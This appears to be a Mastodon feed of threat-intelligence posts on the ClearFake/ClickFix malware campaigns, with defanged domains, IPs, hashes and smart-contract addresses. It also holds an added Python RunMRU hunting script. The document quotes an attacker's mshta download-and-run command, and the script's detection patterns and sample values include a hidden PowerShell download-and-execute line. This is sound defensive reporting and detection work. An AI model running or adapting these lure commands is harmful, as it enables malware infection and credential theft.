#ClearFake

Dark Web Informer @DarkWebInformer@infosec.exchange
2025-12-05

🚨 ClearFake Payload Delivery Domain Identified

A domain linked to ClearFake activity has been flagged delivering a js.clearfake payload with 100% confidence.

Quick Facts:

▪️Type: Domain
▪️Indicator: x5ust[.]windshift[.]ru
▪️Threat Type: Payload Delivery
▪️Malware: js.clearfake
▪️Date: 05 Dec 2025 // 00:17 UTC
▪️Tags: #ClearFake
▪️Reporter: threatcat_ch

URLScan:

▪️Verdict: 0
▪️Title: FASTPANEL
▪️Domain: urlscan.io/domain/x5ust.windsh
▪️Result: urlscan.io/result/019aebe2-3c7
▪️Screenshot: urlscan.io/screenshots/019aebe

DNS / CT Data:

▪️A Records: 104.21.19.50, 172.67.185.61
▪️DNSlytics: dnslytics.com/domain/x5ust.win

Related Intelligence:

▪️CRT: crt.sh/?q=x5ust.windshift.ru
▪️VirusTotal: virustotal.com/gui/domain/x5us

2025-03-20

Here is our in-depth analysis of the latest #ClearFake variant using the Binance Smart Chain and two new ClickFix lures.

ClearFake is injected into thousands of compromised sites to distribute the #Emmental Loader, #Lumma, #Rhadamanthys, and #Vidar.

CTI tip: monitor transactions from the Ethereum address 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA to identify new PowerShell commands distributed by ClearFake - and block/detect any traffic to malicious domains!

As usual, feedback is greatly appreciated!

infosec.exchange/@sekoia_io/11

2025-03-19

TDR analysts published an analysis of the new #ClearFake variant that relies on compromised websites injected with the malicious JavaScript framework, the #EtherHiding technique, and the #ClickFix social engineering tactic.

blog.sekoia.io/clearfakes-new-

2025-03-06

#ClearFake variant is now spreading #Rhadamanthys Stealer via #Emmenhtal Loader.

cc @sekoia_io

1. ClearFake framework is injected on compromised WordPress and relies on EtherHiding

2. The #ClickFix lure uses a fake Cloudflare Turnstile with unusual web traffic

3. Malicious PowerShell command is copied into the user's clipboard data to be executed in the Run dialog box

4. Downloading Emmenhtal from:

bytes.microstorage.]shop (1st stage)
w66.discoverconicalcrouton.]shop (2nd stage)

5. Further downloading and executing Rhadamanthys from:

bytes.microstorage.]shop/code.bin (virustotal.com/gui/file/a88c15)

6. Communicating with C2 at:

91.240.118.]2:9769

Public analysis of the recent ClearFake variant: security.szustak.pl/etherhide/

2025-03-04

Whenever you run something inside a Windows Run dialog box, apparently it gets saved to the registry under the RunMRU key.
This can be helpful for those of you hunting for ClickFix / ClearFake campaign activity since anything executed after the run dialog has a better chance of blending into benign activity.
Building regex patterns on the registry key values can help uncover any malicious commands with multiple arguments.

#clickfix #clearfake #threathunting
forensafe.com/blogs/runmrukey.
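The regex hunt described above, written out as an added example (not code from the post or from forensafe's blog): it walks RunMRU values in MRUList order and flags the ClickFix-style commands this thread documents (mshta fetching a URL, hidden-window PowerShell download-and-run, encoded commands, the fake-CAPTCHA comment tail). The registry path is the real RunMRU location; the sample values and the example.invalid URLs are constructed.

```python
import re

# RunMRU lives here; each value is "<command>\1" and MRUList orders the
# value letters, most recent first. Export it (e.g. reg export) and feed
# the values to hunt().
RUNMRU_PATH = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

DL = r"(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)"
EX = r"(iex|Invoke-Expression)"

# Patterns drawn from the tradecraft described in this thread.
SUSPICIOUS = [
    ("mshta_remote", re.compile(r"\bmshta(\.exe)?\b.*\bhttps?://", re.I)),
    ("ps_hidden", re.compile(r"\bpowershell(\.exe)?\b.*-w(indowstyle)?\s+h(idden)?", re.I)),
    ("ps_download_exec", re.compile(rf"\b{DL}\b.*\b{EX}\b|\b{EX}\b.*\b{DL}\b", re.I)),
    ("ps_encoded", re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("captcha_comment", re.compile(r"#.*(not a robot|captcha|verification id)", re.I)),
]


def strip_run_suffix(value):
    # Explorer stores each Run command with a trailing "\1".
    return value[:-2] if value.endswith("\\1") else value


def classify(command):
    # Names of every pattern that matches, in SUSPICIOUS order.
    return [name for name, rx in SUSPICIOUS if rx.search(command)]


def hunt(mrulist, values):
    # mrulist "cba" means value "c" is the newest entry.
    findings = []
    for key in mrulist:
        if key not in values:
            continue
        cmd = strip_run_suffix(values[key])
        hits = classify(cmd)
        if hits:
            findings.append({"value": key, "command": cmd, "hits": hits})
    return findings


# Constructed sample export, not real data; "c" is the most recent entry.
SAMPLE_MRULIST = "cba"
SAMPLE_VALUES = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex (irm https://example.invalid/x)" '
         "# I am not a robot - reCAPTCHA Verification ID: 1234\\1",
    "c": "mshta https://example.invalid/awjsx.captcha?u=1\\1",
}

if __name__ == "__main__":
    for f in hunt(SAMPLE_MRULIST, SAMPLE_VALUES):
        print(f["value"], f["hits"], f["command"])
```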

2025-02-28

While investigating an infected website, we noticed a call to BSC testnet contract 0x0967296defa0fd586c9ede5730380e2b059fab95 : testnet.bscscan.com/address/0x

The contract's content is clearly malicious and connects over WebSocket to suckerity[.]xyz (behind Cloudflare); it is not related to #ClearFake, but reminds us of #Magecart-related injections:

2025-02-28

#etherhiding (hiding malicious code in blockchain-based smart contracts) is not only used by #ClearFake-related actors, but now also by #Magecart 👇

2025-02-05 (Wednesday): #ClearFake / #ClickFix style fake CAPTCHA leads to possible #Vidar.

Vidar C2 using eteherealpath[.]top behind Cloudflare.

Details at github.com/malware-traffic/ind

2025-02-02

Malicious code has been stored in the blockchain forever

One of the old hacker tricks is to distribute malware disguised as a browser update. A banner is placed on the compromised site claiming that you need to update your browser to view it, along with a button to download the update, as in the screenshot from last year's ClearFake attack. In this way, the victim installs the malware on their own computer themselves. Last year, the attackers devised a clever way to protect the malicious software from takedown: they placed it in a decentralized, anonymous blockchain. That is, they integrated the code into a smart contract, which is now preserved in public forever.

habr.com/ru/companies/globalsi

#blockchain #browser_update #BSC #Binance_Smart_Chain #Binance #BNB #WordPress #ClearFake #BscScan #EtherHiding

2025-01-23

Campaign employs the Etherhide technique, where payloads are delivered from smart Web3 contracts and Cloudflare-hosted sites spreading Vidar malware across infected ~5k wordpress websites. The campaign has been active for ~3 months as of 2024-11-24. #Binance #EtherHide #ClearFake #ClickFix #Malware #IOC #przepisyjoli ;)

security.szustak.pl/etherhide/

#Clearfake killchain today:

victim site
-->
data-seed-prebsc-1-s1.bnbchain[.]org (0x80d31D935f0EC978253A26D48B5593599B9542C7)
-->
clickfix popup
-->
mshta hxxps[:]//solve.lzmb[.]org/awjsx.captcha?u={usr_id} # ✅ ''I am not a robot - reCAPTCHA Verification ID: 9973''
-->
hxxps[:]//u1.jumpcelibateencounter[.]shop/sh_RTXY4.mp4
(2b4ea59a346f5762e0e5731e0e736b08607e652424f49398ca4dfe593187565c)

Ultimately delivers Lumma

2025-01-06

#ClearFake / #ClickFix is back infecting directly legit but vulnerable websites, delivering in the end #Lumma / #LummaStealer

2024-10-29

#ClearFake variant (without using the EtherHiding technique) is spreading #Lumma via the #ClickFix tactic on compromised websites.

- Sends fingerprint data to 176.59.196.]133/ip.php
- Copies PowerShell script to clipboard
- Downloads ZIP from GitHub
- Executes Lumma

Example of website compromised by ClearFake on urlscan:
urlscan.io/result/fa9231e0-849

PowerShell script copied to clipboard:
gist.github.com/qbourgue/61064

Malicious ZIP payload (Lumma):
tria.ge/241029-1dp31s1phk/beha

Lumma C2:

Payload hosting URL (404):
hxxps://github.]com/Vlad-A41323/PowerSheell/raw/refs/heads/main/Seven_NSKJY_x91.2.zip

@rmceoin @threatcat_ch @cyberamateur

2024-09-26

New Swiss-centered malware campaign in German using some #ClearFake / #ClickFix tricks, impersonating Ricardo, one of the biggest Swiss online second-hand marketplaces:

2024-09-24

Finally, we also witnessed in the wild one of those #ClearFake / #ClickFix baits delivered by email, as reported by Proofpoint in June, ending with a #brutel / #Latrodectus / #BruteRatel payload: proofpoint.com/au/blog/threat-

@monitorsg #ClearFake is back to fake browser updates. The EXE leads to a Lumma stealer that appears to use these domains.

predatowpmn[.]shop
preachstrwnwjw[.]shop
pang-scrooge-carnage[.]shop

h/t @GustyDusty

2024-09-10

Detected #ClearFake infection chain

Compromised site
-->
bsc-dataseed3.defibit[.]io (Binance 0xC4D41e800A4C05ce291f6AE4baF49b002a081290)
-->
quickresource[.]xyz/VWBhLwJg/
-->
dl.dropboxusercontent[.]com (download)

d5558bb4f7db0aab0c709068a9561cd79eafaf035038d42f321620c94883762a Installer.exe

New #Clearfake domain
bsc-dataseed3[.]defibit[.]io
-->
bigdownload[.]xyz/VWBhLwJg

Detected #Clearfake infection chain

Victim site
-->
bsc-dataseed3[.]defibit[.]io (0xC4D41e800A4C05ce291f6AE4baF49b002a081290)
-->
majordatabases[.]lat

Possibly a new tld? The previous address was ichiupdate[.]lat

2024-08-06

After mucking around a bit, I finally got a working Dropbox URL and file for the #Clearfake-distributed #AtomicStealer fake Chrome sample: urlscan.io/result/376addbb-7bc tria.ge/240806-sahwjasark/beha. And now it's a different IP, 45.134.26[.]7, for the C2.
